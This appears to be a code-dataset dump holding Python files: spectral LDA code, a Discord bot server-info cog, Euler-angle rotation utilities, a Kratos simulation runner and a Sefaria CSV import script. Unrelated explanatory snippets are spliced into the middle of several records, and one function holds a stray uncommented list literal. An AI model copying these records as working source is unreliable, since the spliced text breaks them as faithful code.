i]),\n\t\t\t\tnp.linalg.norm(self.factors[0][:, i] - self.factors[1][:, i]),\n\t\t\t]\n\t\t\tfactor[:, i] = self.factors[np.argmin(diff)][:, i]\n\t\treturn factor\n\n\t# @seed(44)\n\t@noiser(edge='e4')\n\tdef create_whitener(self):\n\t\t\"\"\"\n\t\tCreates whitener.\n\t\t:return:\n\t\t\"\"\"\n\t\treturn oe.contract('ij,ik->jk', self.m2_eigenvectors_partial,\n\t\t np.diag(1 / np.sqrt(self.m2_eigenvalues_partial)))\n\n\t# @seed(45)\n\t@noiser(edge='e8')\n\tdef create_unwhitener(self):\n\t\t\"\"\"\n\t\tCreates unwhitener.\n\t\t:return:\n\t\t\"\"\"\n\t\treturn oe.contract('ij,ik->jk', self.m2_eigenvectors_partial,\n\t\t np.diag(np.sqrt(self.m2_eigenvalues_partial)))\n\n\t# @seed(50)\n\t@noiser(edge='e9')\n\tdef create_topic_word_distribution(self):\n\t\t\"\"\"\n\t\tCreates topic word distribution.\n\t\t:return:\n\t\t\"\"\"\n\t\t# this is not true\n\t\treturn self.unwhitener.dot(self.unique_factor).dot(\n\t\t\tnp.diag(self.m3_eigenvalues))\n# \t\treturn self.unwhitener.dot(self.unique_factor).dot(\n# \t\t\tnp.diag(np.sqrt(self.m2_eigenvalues_partial)))\n\n\t@property\n\tdef n_docs(self):\n\t\treturn self.document_word_counts.shape[0]\n\n\t@property\n\tdef n_words(self):\n\t\treturn self.document_word_counts.shape[1]\n\n\t@property\n\tdef alpha0(self):\n\t\tif self._alpha0:\n\t\t\treturn self._alpha0\n\t\telse:\n\t\t\treturn np.sum(self.alpha)\n\n\t@property\n\tdef alpha(self):\n\t\t\"\"\"\n\t\tAlias of doc_topic_prior\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.doc_topic_prior\n\n\t@property\n\tdef beta(self):\n\t\t\"\"\"\n\t\tAlias of topic_word_distribution\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.topic_word_distribution\n\n\t@property\n\tdef k(self):\n\t\t\"\"\"\n\t\tAlias of n_topics\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.n_topics\n\n\t@property\n\tdef vocab_size(self):\n\t\t\"\"\"\n\t\tAlias of n_words\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.n_words\n\n\t@property\n\tdef l_ns(self):\n\t\t\"\"\"\n\t\tTotal number of words in each document.\n\t\t:return:\n\t\t\"\"\"\n\t\tif 
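sparse.issparse(self.document_word_counts):\n\t\t\treturn self.document_word_counts.sum(axis=1)\n\t\telse:\n\t\t\treturn self.document_word_counts.sum(axis=1, keepdims=True)\n

The moment builders above are written as opt_einsum contractions. A tiny self-contained reference for the pattern (all values invented): 'i,j,k->ijk' is the third-order outer product that term3 forms from the first moment, and oe.contract mirrors np.einsum's signature:

import numpy as np
import opt_einsum as oe

v = np.array([0.2, 0.3, 0.5])              # stand-in for a first moment
T = oe.contract('i,j,k->ijk', v, v, v)     # third-order outer product
assert np.allclose(T, np.einsum('i,j,k->ijk', v, v, v))
assert np.isclose(T[0, 1, 2], 0.2 * 0.3 * 0.5)
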
\t@property\n\tdef document_word_proportions(self):\n\t\tif sparse.issparse(self.document_word_counts):\n\t\t\treturn self.document_word_counts / self.document_word_counts.sum(axis=1)\n\t\telse:\n\t\t\treturn self.document_word_counts / self.document_word_counts.sum(axis=1, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t keepdims=True)\n\n\n\t@property\n\tdef m2_eigenvalues_partial(self):\n\t\treturn self.m2_eigenvalues[:self.n_topics]\n\n\t@property\n\tdef m2_eigenvectors_partial(self):\n\t\treturn self.m2_eigenvectors[:self.n_topics]\n","sub_path":"privatespectrallda/privatespectrallda/dps_lda.py","file_name":"dps_lda.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396475313","text":"import asyncio\nimport discord\nimport requests\nimport string\nimport os\nfrom datetime import datetime\nfrom discord.ext import commands\nfrom Cogs import Settings\nfrom Cogs import Message\nfrom Cogs import Nullify\n\n# This module sets/gets some server info\n\nclass Server:\n\n\t# Init with the bot reference, and a reference to the settings var and xp var\n\tdef __init__(self, bot, settings):\n\t\tself.bot = bot\n\t\tself.settings = settings\n\n\t@commands.command(pass_context=True)\n\tasync def setinfo(self, ctx, *, word : str = None):\n\t\t\"\"\"Sets the server info (admin only).\"\"\"\n\n\t\t# Check for admin status\n\t\tisAdmin = ctx.message.author.permissions_in(ctx.message.channel).administrator\n\t\tif not isAdmin:\n\t\t\tcheckAdmin = self.settings.getServerStat(ctx.message.server, \"AdminArray\")\n\t\t\tfor role in ctx.message.author.roles:\n\t\t\t\tfor aRole in checkAdmin:\n\t\t\t\t\t# Get the role that corresponds to the id\n\t\t\t\t\tif aRole['ID'] == role.id:\n\t\t\t\t\t\tisAdmin = True\n\t\t# Only allow admins to change server stats\n\t\tif not isAdmin:\n\t\t\tawait self.bot.send_message(ctx.message.channel, 'You do not have sufficient privileges to access this command.')\n\t\t\treturn\n\n\t\t# We're admin\n\t\tif not word:\n\t\t\tself.settings.setServerStat(ctx.message.server, \"Info\", None)\n\t\t\tmsg = 'Server info *removed*.'\n\t\telse:\n\t\t\tself.settings.setServerStat(ctx.message.server, \"Info\", word)\n\t\t\tmsg = 'Server info *updated*.'\n\n\t\tawait self.bot.send_message(ctx.message.channel, msg)\n\n\t@commands.command(pass_context=True)\n\tasync def info(self, ctx):\n\t\t\"\"\"Displays the server info if any.\"\"\"\n\n\t\t# Check if we're suppressing @here and @everyone mentions\n\t\tif self.settings.getServerStat(ctx.message.server, \"SuppressMentions\").lower() == \"yes\":\n\t\t\tsuppress = True\n\t\telse:\n\t\t\tsuppress = False\n\n\t\tserverInfo = self.settings.getServerStat(ctx.message.server, \"Info\")\n\t\tmsg = 'I have no info on *{}* yet.'.format(ctx.message.server.name)\n\t\tif serverInfo:\n\t\t\tmsg = '*{}*:\\n\\n{}'.format(ctx.message.server.name, serverInfo)\n\n\t\t# Check for suppress\n\t\tif suppress:\n\t\t\tmsg = Nullify.clean(msg)\n\n\t\tawait self.bot.send_message(ctx.message.channel, msg)\n\n\t@commands.command(pass_context=True)\n\tasync def dumpservers(self, ctx):\n\t\t\"\"\"Dumps a timestamped list of servers into the same directory as the bot (owner only).\"\"\"\n\t\t\n\t\tauthor = ctx.message.author\n\t\tserver = ctx.message.server\n
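
The LDA class above imports euclidean_proj_simplex from a helpers module that is not part of this record. For orientation, a sketch of the standard Euclidean projection onto the probability simplex (Duchi et al., 2008), assuming the helper does something equivalent — the function name here is mine:

import numpy as np

def euclidean_proj_simplex_sketch(v, s=1.0):
    # sort descending, locate the pivot rho, then soft-threshold
    u = np.sort(v)[::-1]
    cssv = np.cumsum(u) - s
    ind = np.arange(1, len(v) + 1)
    rho = ind[u - cssv / ind > 0][-1]
    theta = cssv[rho - 1] / rho
    return np.maximum(v - theta, 0.0)

w = euclidean_proj_simplex_sketch(np.array([0.9, -0.1, 0.6]))
assert np.isclose(w.sum(), 1.0) and (w >= 0).all()

\t\tchannel = 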
ctx.message.channel\n\n\t\ttry:\n\t\t\towner = self.settings.serverDict['Owner']\n\t\texcept KeyError:\n\t\t\towner = None\n\n\t\tif owner == None:\n\t\t\t# No previous owner, let's set them\n\t\t\tmsg = 'I cannot dump the server list until I have an owner.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\t\tif not author.id == owner:\n\t\t\t# Not the owner\n\t\t\tmsg = 'You are not the *true* owner of me. Only the rightful owner can dump the server list.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\n\t\ttimeStamp = datetime.today().strftime(\"%Y-%m-%d %H.%M\")\n\t\tserverFile = 'ServerList-{}.txt'.format(timeStamp)\n\t\tmessage = await self.bot.send_message(ctx.message.channel, 'Saving server list to *{}*...'.format(serverFile))\n\t\tmsg = ''\n\t\tfor server in self.bot.servers:\n\t\t\tmsg += server.name + \"\\n\"\n\t\t\tmsg += server.id + \"\\n\"\n\t\t\tmsg += str(len(server.members)) + \"\\n\\n\"\n\n\t\t# Trim the last 2 newlines\n\t\tmsg = msg[:-2].encode(\"utf-8\")\n\t\t\n\t\twith open(serverFile, \"wb\") as myfile:\n\t\t\tmyfile.write(msg)\n\n\t\tmessage = await self.bot.edit_message(message, 'Uploading *{}*...'.format(serverFile))\n\t\tawait self.bot.send_file(ctx.message.channel, serverFile)\n\t\tmessage = await self.bot.edit_message(message, 'Uploaded *{}!*'.format(serverFile))\n\t\tos.remove(serverFile)\n\n\n\t@commands.command(pass_context=True)\n\tasync def leaveserver(self, ctx, *, targetServer = None):\n\t\t\"\"\"Leaves a server - can take a name or id (owner only).\"\"\"\n\t\t\n\t\tauthor = ctx.message.author\n\t\tserver = ctx.message.server\n\t\tchannel = ctx.message.channel\n\n\t\ttry:\n\t\t\towner = self.settings.serverDict['Owner']\n\t\texcept KeyError:\n\t\t\towner = None\n\n\t\tif owner == None:\n\t\t\t# No previous owner, let's set them\n\t\t\tmsg = 'I cannot leave servers until I have an owner.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\t\tif not author.id == owner:\n\t\t\t# Not the owner\n\t\t\tmsg = 'You are not the *true* owner of me. 
Only the rightful owner can have me leave servers.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\n\t\tif targetServer == None:\n\t\t\t# No server passed\n\t\t\tmsg = 'Usage: `{}leaveserver [id/name]`'.format(ctx.prefix)\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\n\t\t# Check id first, then name\n\t\tfor aServer in self.bot.servers:\n\t\t\tif str(aServer.id) == str(targetServer):\n\t\t\t\t# Found it by id\n\t\t\t\tawait self.bot.send_message(aServer, 'Thanks for having me - but it\\'s my time to go...')\n\t\t\t\tawait self.bot.leave_server(aServer)\n\t\t\t\treturn\n\t\t# Didn't find it - try by name\n\t\tfor aServer in self.bot.servers:\n\t\t\tif aServer.name.lower() == targetServer.lower():\n\t\t\t\t# Found it by name\n\t\t\t\tawait self.bot.send_message(aServer, 'Thanks for having me - but it\\'s my time to go...')\n\t\t\t\tawait self.bot.leave_server(aServer)\n\t\t\t\treturn\n\n\t\tawait self.bot.send_message(ctx.message.channel, 'I couldn\\'t find that server.')","sub_path":"Cogs/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"364547189","text":"import numpy as np\nimport math\n# axis sequences for Euler angles\n_NEXT_AXIS = [1, 2, 0, 1]\n\n# map axes strings to/from tuples of inner axis, parity, repetition, frame\n_AXES2TUPLE = {\n 'sxyz': (0, 0, 0, 0), 'sxyx': (0, 0, 1, 0), 'sxzy': (0, 1, 0, 0),\n 'sxzx': (0, 1, 1, 0), 'syzx': (1, 0, 0, 0), 'syzy': (1, 0, 1, 0),\n 'syxz': (1, 1, 0, 0), 'syxy': (1, 1, 1, 0), 'szxy': (2, 0, 0, 0),\n 'szxz': (2, 0, 1, 0), 'szyx': (2, 1, 0, 0), 'szyz': (2, 1, 1, 0),\n 'rzyx': (0, 0, 0, 1), 'rxyx': (0, 0, 1, 1), 'ryzx': (0, 1, 0, 1),\n 'rxzx': (0, 1, 1, 1), 'rxzy': (1, 0, 0, 1), 'ryzy': (1, 0, 1, 1),\n 'rzxy': (1, 1, 0, 1), 'ryxy': (1, 1, 1, 1), 'ryxz': (2, 0, 0, 1),\n 'rzxz': (2, 0, 1, 1), 'rxyz': (2, 1, 0, 1), 'rzyz': (2, 1, 1, 1)}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n# For testing whether a number is close to zero\n_EPS4 = np.finfo(float).eps * 4.0\n\n\ndef euler2mat(ai, aj, ak, axes='sxyz'):\n \"\"\"Return rotation matrix from Euler angles and axis sequence.\n Parameters\n ----------\n ai : float\n First rotation angle (according to `axes`).\n aj : float\n Second rotation angle (according to `axes`).\n ak : float\n Third rotation angle (according to `axes`).\n axes : str, optional\n Axis specification; one of 24 axis sequences as string or encoded\n tuple - e.g. 
``sxyz`` (the default).\n Returns\n -------\n mat : array (3, 3)\n Rotation matrix or affine.\n Examples\n --------\n >>> R = euler2mat(1, 2, 3, 'syxz')\n >>> np.allclose(np.sum(R[0]), -1.34786452)\n True\n >>> R = euler2mat(1, 2, 3, (0, 1, 0, 1))\n >>> np.allclose(np.sum(R[0]), -0.383436184)\n True\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n if frame:\n ai, ak = ak, ai\n if parity:\n ai, aj, ak = -ai, -aj, -ak\n\n si, sj, sk = math.sin(ai), math.sin(aj), math.sin(ak)\n ci, cj, ck = math.cos(ai), math.cos(aj), math.cos(ak)\n cc, cs = ci*ck, ci*sk\n sc, ss = si*ck, si*sk\n\n M = np.eye(3)\n if repetition:\n M[i, i] = cj\n M[i, j] = sj*si\n M[i, k] = sj*ci\n M[j, i] = sj*sk\n M[j, j] = -cj*ss+cc\n M[j, k] = -cj*cs-sc\n M[k, i] = -sj*ck\n M[k, j] = cj*sc+cs\n M[k, k] = cj*cc-ss\n else:\n M[i, i] = cj*ck\n M[i, j] = sj*sc-cs\n M[i, k] = sj*cc+ss\n M[j, i] = cj*sk\n M[j, j] = sj*ss+cc\n M[j, k] = sj*cs-sc\n M[k, i] = -sj\n M[k, j] = cj*si\n M[k, k] = cj*ci\n return M\n\n\ndef mat2euler(mat, axes='sxyz'):\n \"\"\"Return Euler angles from rotation matrix for specified axis sequence.\n Note that many Euler angle triplets can describe one matrix.\n Parameters\n ----------\n mat : array-like shape (3, 3) or (4, 4)\n Rotation matrix or affine.\n axes : str, optional\n Axis specification; one of 24 axis sequences as string or encoded\n tuple - e.g. ``sxyz`` (the default).\n Returns\n -------\n ai : float\n First rotation angle (according to `axes`).\n aj : float\n Second rotation angle (according to `axes`).\n ak : float\n Third rotation angle (according to `axes`).\n Examples\n --------\n >>> R0 = euler2mat(1, 2, 3, 'syxz')\n >>> al, be, ga = mat2euler(R0, 'syxz')\n >>> R1 = euler2mat(al, be, ga, 'syxz')\n >>> np.allclose(R0, R1)\n True\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n M = np.array(mat, dtype=np.float64, copy=False)[:3, :3]\n if repetition:\n sy = math.sqrt(M[i, j]*M[i, j] + M[i, k]*M[i, k])\n if sy > _EPS4:\n ax = math.atan2( M[i, j], M[i, k])\n ay = math.atan2( sy, M[i, i])\n az = math.atan2( M[j, i], -M[k, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2( sy, M[i, i])\n az = 0.0\n else:\n cy = math.sqrt(M[i, i]*M[i, i] + M[j, i]*M[j, i])\n if cy > _EPS4:\n ax = math.atan2( M[k, j], M[k, k])\n ay = math.atan2(-M[k, i], cy)\n az = math.atan2( M[j, i], M[i, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2(-M[k, i], cy)\n az = 0.0\n\n if parity:\n ax, ay, az = -ax, -ay, -az\n if frame:\n ax, az = az, ax\n return ax, ay, az","sub_path":"transform3d/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556924345","text":"from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7\n# Activate it to import in the gdb path:\n# import sys\n# sys.path.append('/home/jmaria/kratos')\n# x = raw_input(\"stopped to allow debug: set breakpoints and press enter to continue\");\n\n#\n# ***************GENERAL MAIN OF THE 
ANALYSIS****************###\n#\n\n# time control starts\nfrom time import *\nprint(ctime())\n# measure process time\nt0p = clock()\n# measure wall time\n# t0w = time()\n\n# ----------------------------------------------------------------#\n# --CONFIGURATIONS START--####################\n# Import the general variables read from the GiD\nimport ProjectParameters as general_variables\n\n# setting the domain size for the problem to be solved\ndomain_size = general_variables.domain_size\n\n# including kratos path\nfrom KratosMultiphysics import *\n\n# including Applications paths\nfrom KratosMultiphysics.ExternalSolversApplication import *\nfrom KratosMultiphysics.SolidMechanicsApplication import *\nfrom KratosMultiphysics.StructuralMechanicsApplication import *\n\n# import the python utilities:\nimport restart_utility as restart_utils\nimport gid_output as gid_utils\n\nimport conditions_python_utility as condition_utils\nimport list_files_python_utility as files_utils\n\nimport time_operation_utility as operation_utils\n\n# ------------------------#--FUNCTIONS START--#------------------#\n# ---------------------------------------------------------------#\n# --TIME MONITORING START--##################\ndef StartTimeMeasuring():\n    # measure process time\n    time_ip = clock()\n    return time_ip\n\n\ndef StopTimeMeasuring(time_ip, process):\n    # measure process time\n    time_fp = clock()\n    print(\" \", process, \" [ spent time = \", time_fp - time_ip, \"] \")\n# --TIME MONITORING END --###################\n\n# --SET NUMBER OF THREADS --#################\n\n\ndef SetParallelSize(num_threads):\n    parallel = OpenMPUtils()\n    print(\"Num Threads = \", num_threads)\n    parallel.SetNumThreads(int(num_threads))\n# --SET NUMBER OF THREADS --#################\n\n# ------------------------#--FUNCTIONS END--#--------------------#\n# ---------------------------------------------------------------#\n\n\n# defining the number of threads:\nnum_threads = general_variables.NumberofThreads\nSetParallelSize(num_threads)\n\n# defining the type, the name and the path of the problem:\nproblem_type = general_variables.ProblemType\nproblem_name = general_variables.problem_name\nproblem_path = general_variables.problem_path\n\n# defining a model part\nmodel_part = ModelPart(\"SolidDomain\")\n\n# defining the model size to scale\nlength_scale = 1.0\n\n# --DEFINE MAIN SOLVER START--################\n\nSolverSettings = general_variables.SolverSettings\n\n# import solver file\nsolver_constructor = __import__(SolverSettings.solver_type)\n\n# construct the solver\nmain_step_solver = solver_constructor.CreateSolver(model_part, SolverSettings)\n\n# --DEFINE MAIN SOLVER END--##################\n\n\n# --READ AND SET MODEL FILES--###############\n\n# set the restart of the problem\nrestart_step = general_variables.Restart_Step\nproblem_restart = restart_utils.RestartUtility(model_part, problem_path, problem_name)\n\n# set the results file list of the problem (managed by the problem_restart and gid_print)\nprint_lists = general_variables.PrintLists\noutput_mode = general_variables.GidOutputConfiguration.GiDPostMode\nlist_files = files_utils.ListFilesUtility(problem_path, problem_name, print_lists, output_mode)\nlist_files.Initialize(general_variables.file_list)\n\n# --READ AND SET MODEL FILES END--############\n\n\n# --DEFINE CONDITIONS START--#################\nincr_disp = general_variables.Incremental_Displacement\nincr_load = general_variables.Incremental_Load\nrotation_dofs = SolverSettings.RotationDofs\n
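
Note that time.clock, used by the timing helpers above, was deprecated in Python 3.3 and removed in 3.8. A hedged sketch of an equivalent context-manager wrapper over time.perf_counter (the name measuring is mine, not part of the Kratos utilities):

from contextlib import contextmanager
from time import perf_counter

@contextmanager
def measuring(process):
    time_ip = perf_counter()
    try:
        yield
    finally:
        print(" ", process, " [ spent time = ", perf_counter() - time_ip, "] ")

# usage sketch:
# with measuring("Solving"):
#     main_step_solver.Solve()

conditions = 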
condition_utils.ConditionsUtility(model_part, domain_size, incr_disp, incr_load, rotation_dofs)\n\n# --DEFINE CONDITIONS END--###################\n\n\n# --GID OUTPUT OPTIONS START--###############\n# set gid print options\ngid_print = gid_utils.GiDOutput(problem_name, general_variables.GidOutputConfiguration)\n\n# --GID OUTPUT OPTIONS END--##################\n\n\n# --CONFIGURATIONS END--######################\n# ----------------------------------------------------------------#\n\n\n# --START SOLUTION--######################\n#\n# initialize problem : load restart or initial start\nload_restart = general_variables.LoadRestart\nsave_restart = general_variables.SaveRestart\n\n# set buffer size\nbuffer_size = 3\n\n# define problem variables:\nsolver_constructor.AddVariables(model_part, SolverSettings)\n\n\n# --- READ MODEL ------#\nif(load_restart == False):\n\n # remove results, restart, graph and list previous files\n problem_restart.CleanPreviousFiles()\n list_files.RemoveListFiles()\n\n # reading the model\n model_part_io = ModelPartIO(problem_name)\n model_part_io.ReadModelPart(model_part)\n\n # set the buffer size\n model_part.SetBufferSize(buffer_size)\n # Note: the buffer size should be set once the mesh is read for the first time\n\n # set the degrees of freedom\n solver_constructor.AddDofs(model_part, SolverSettings)\n\n # set the constitutive law\n import constitutive_law_python_utility as constitutive_law_utils\n\n constitutive_law = constitutive_law_utils.ConstitutiveLawUtility(model_part, domain_size);\n constitutive_law.Initialize();\n\nelse:\n\n # reading the model from the restart file\n problem_restart.Load(restart_step);\n\n # remove results, restart, graph and list posterior files\n problem_restart.CleanPosteriorFiles(restart_step)\n list_files.ReBuildListFiles()\n\n# set mesh searches and modeler\n# modeler.InitializeDomains();\n\n# if(load_restart == False):\n # find nodal h\n # modeler.SearchNodalH();\n\n\n# --- PRINT CONTROL ---#\nprint(model_part)\nprint(model_part.Properties[1])\n\n\n# --INITIALIZE--###########################\n#\n\n# set delta time in process info\nmodel_part.ProcessInfo[DELTA_TIME] = general_variables.time_step\n\n# solver initialize\nmain_step_solver.Initialize()\nmain_step_solver.SetRestart(load_restart) #calls strategy initialize if no restart\n\n# initial contact search\n# modeler.InitialContactSearch()\n\n#define time steps and loop range of steps\ntime_step = model_part.ProcessInfo[DELTA_TIME]\n\n# define time steps and loop range of steps\nif(load_restart):\n\n buffer_size = 0\n\nelse:\n\n model_part.ProcessInfo[TIME] = 0\n model_part.ProcessInfo[TIME_STEPS] = 0\n model_part.ProcessInfo[PREVIOUS_DELTA_TIME] = time_step;\n\n conditions.Initialize(time_step);\n\n\n# initialize step operations\nstarting_step = model_part.ProcessInfo[TIME_STEPS]\nstarting_time = model_part.ProcessInfo[TIME]\nending_step = general_variables.nsteps\nending_time = general_variables.nsteps * time_step\n\n\noutput_print = operation_utils.TimeOperationUtility()\ngid_time_frequency = general_variables.GiDWriteFrequency\noutput_print.InitializeTime(starting_time, ending_time, time_step, gid_time_frequency)\n\nrestart_print = operation_utils.TimeOperationUtility()\nrestart_time_frequency = general_variables.RestartFrequency\nrestart_print.InitializeTime(starting_time, ending_time, time_step, restart_time_frequency)\n\n\n# --TIME INTEGRATION--#######################\n#\n\n# writing a single file\ngid_print.initialize_results(model_part)\n\n#initialize time integration 
variables\ncurrent_time = starting_time\ncurrent_step = starting_step\n\n# filling the buffer\nfor step in range(0,buffer_size):\n\n    model_part.CloneTimeStep(current_time)\n    model_part.ProcessInfo[DELTA_TIME] = time_step\n    model_part.ProcessInfo[TIME_STEPS] = step-buffer_size\n\n# writing an initial state results file\ncurrent_id = 0\ngid_print.write_results(current_time, model_part, general_variables.nodal_results, general_variables.gauss_points_results)\nlist_files.PrintListFiles(current_id);\n\n# solving the problem\nwhile(current_time < ending_time):\n\n    # store previous time step\n    model_part.ProcessInfo[PREVIOUS_DELTA_TIME] = time_step\n    # set new time step ( it can change when solve is called )\n    time_step = model_part.ProcessInfo[DELTA_TIME]\n\n    current_time = current_time + time_step\n    current_step = current_step + 1\n    model_part.CloneTimeStep(current_time)\n    model_part.ProcessInfo[TIME] = current_time\n\n    print(\"STEP = \", current_step)\n    print(\"TIME = \", current_time)\n\n    clock_time = StartTimeMeasuring();\n    # solve time step non-linear system\n    main_step_solver.Solve()\n    StopTimeMeasuring(clock_time, \"Solving\");\n\n    # incremental load\n    conditions.SetIncrementalLoad(current_step, time_step);\n\n    # print the results at the end of the step\n    #execute_write = output_print.perform_time_operation(current_time)\n    execute_write = False\n    if(execute_write):\n        clock_time = StartTimeMeasuring();\n        current_id = output_print.operation_id()\n        # print gid output file\n        gid_print.write_results(model_part, general_variables.nodal_results, general_variables.gauss_points_results, current_time, current_step, current_id)\n        # print on list files\n        list_files.PrintListFiles(current_id);\n        StopTimeMeasuring(clock_time, \"Write Results\");\n\n    # print restart file\n    save_restart = False\n    if(save_restart):\n        execute_save = restart_print.perform_time_operation(current_time)\n        if(execute_save):\n            clock_time = StartTimeMeasuring();\n            current_id = output_print.operation_id()\n            problem_restart.Save(current_time, current_step, current_id);\n            StopTimeMeasuring(clock_time, \"Restart\");\n\n    conditions.RestartImposedDisp()\n\n# --FINALIZE--############################\n#\n\n# writing a single file\ngid_print.finalize_results()\n\nprint(\"Analysis Finalized \")\n\n# --END--###############################\n#\n\n# measure process time\ntfp = clock()\n# measure wall time\n# tfw = time()\n\nprint(ctime())\n# print \"Analysis Completed [Process Time = \", tfp - t0p, \"seconds, Wall Time = \", tfw - t0w, \" ]\"\nprint(\"Analysis Completed [Process Time = \", tfp - t0p, \"] \")\n\n# to create a benchmark: add standard benchmark files and uncomment next two lines \n# rename the file to: run_test.py\nfrom run_test_benchmark_results import *\nWriteBenchmarkResults(model_part)\n","sub_path":"kratos/applications/StructuralMechanicsApplication/test_examples/Shell_Q4_Thick__DrillingRollUp.gid/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":10140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"582000351","text":"import django\n\ndjango.setup()\n\n# import statistics\nimport csv\nfrom sefaria.model import *\nfrom sefaria.helper.schema import insert_last_child, reorder_children\nfrom sefaria.helper.schema import remove_branch\nfrom sefaria.tracker import modify_bulk_text\nfrom sefaria.system.database import db\nimport time\n\n\nHEBREW_NUMERALS = {\n    \"I\": \"א'\", \"II\": \"ב'\", \"III\": \"ג'\", \"IV\": \"ד'\", \"V\": \"ה'\",\n    \"VI\": \"ו'\", \"VII\": \"ז'\", \"VIII\": \"ח'\", \"IX\": \"ט'\", \"X\": \"י'\",\n    \"XI\": 'י\"א', \"XII\": 'י\"ב', \"XIII\": 'י\"ג', \"XIV\": 'י\"ד', \"XV\": 'ט\"ו',\n    \"XVI\": 'ט\"ז', \"XVII\": 'י\"ז', \"XVIII\": 'י\"ח', \"XIX\": 'י\"ט', \"XX\": \"כ'\",\n    \"XXI\": 'כ\"א', \"XXII\": 'כ\"ב', \"XXIII\": 'כ\"ג', \"XXIV\": 'כ\"ד', \"XXV\": 'כ\"ה',\n    \"XXVI\": 'כ\"ו', \"XXVII\": 'כ\"ז', \"XXVIII\": 'כ\"ח', \"XXIX\": 'כ\"ט', \"XXX\": \"ל'\",\n}\n\n\ndef latin_numeral_to_hebrew_numeral(latin_numeral):\n    # table lookup; unknown numerals yield None\n    return HEBREW_NUMERALS.get(latin_numeral)\n\n\ndef translate_title_to_hebrew(title, masechet_hebrew):\n    hebrew_title = ''\n    # 'Summary of' titles also contain \" Perek \", so they must be handled\n    # before the generic Perek case below\n    if 'Summary of' in title:\n        hebrew_title += 'סיכום לפרק '\n        numeral = title.split(' ')[3].strip()\n        hebrew_title += latin_numeral_to_hebrew_numeral(numeral)\n        return hebrew_title\n\n    if 'Introduction to' in title:\n        hebrew_title += 'הקדמה ל'\n\n    if \" Perek \" in title:\n        hebrew_title += 'פרק '\n        hebrew_title += latin_numeral_to_hebrew_numeral(title.split(' ')[3].strip())\n        return hebrew_title\n\n    else:\n        hebrew_title += \"מסכת \"\n        hebrew_title += masechet_hebrew\n        return hebrew_title\n\n\ndef parse_csv_to_object():\n    list_of_dicts = []\n    # structure:\n    [{'ref': ...,\n     'english_text': [],\n     'hebrew_text': [],\n     'masechet': ...,\n     'masechet_hebrew': ...,\n     'title': 'Introduction to Berakhot',\n     'title_hebrew': ''}]\n    with open('introductions.csv', newline='') as csvfile:\n        r = csv.reader(csvfile, delimiter=',')\n\n        current_ref_dict = {}\n        for row in r:\n            ref = row[0]\n            if ref != '':\n                current_ref_dict = {}\n                current_ref_dict[\"ref\"] = ref\n                current_ref_dict['english_text'] = []\n                current_ref_dict['english_text'].append(row[1])\n                current_ref_dict['hebrew_text'] = []\n                current_ref_dict['hebrew_text'].append(row[2])\n\n                ##########################\n                # getting titles and mesechtot:\n\n                ref_parts = ref.split(',')\n\n                masechet = ref_parts[1].strip()\n                masechet_hebrew = Ref(masechet).he_normal()\n\n                title = ref_parts[2].strip()\n                title_hebrew = translate_title_to_hebrew(title, masechet_hebrew)\n\n                current_ref_dict[\"masechet\"] = masechet\n                current_ref_dict[\"masechet_hebrew\"] = masechet_hebrew\n                current_ref_dict[\"title\"] = title\n                current_ref_dict[\"title_hebrew\"] = title_hebrew\n                if len(current_ref_dict[\"english_text\"]) == 1:\n                    list_of_dicts.append(current_ref_dict)\n            else:\n                current_ref_dict['english_text'].append(row[1])\n                current_ref_dict['hebrew_text'].append(row[2])\n\n    return (list_of_dicts)\n\n\ndef get_list_of_masechtot_nodes(list_of_masechtot, starting_masechet_name):\n    found_starting_masechet_flag = False\n    # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n
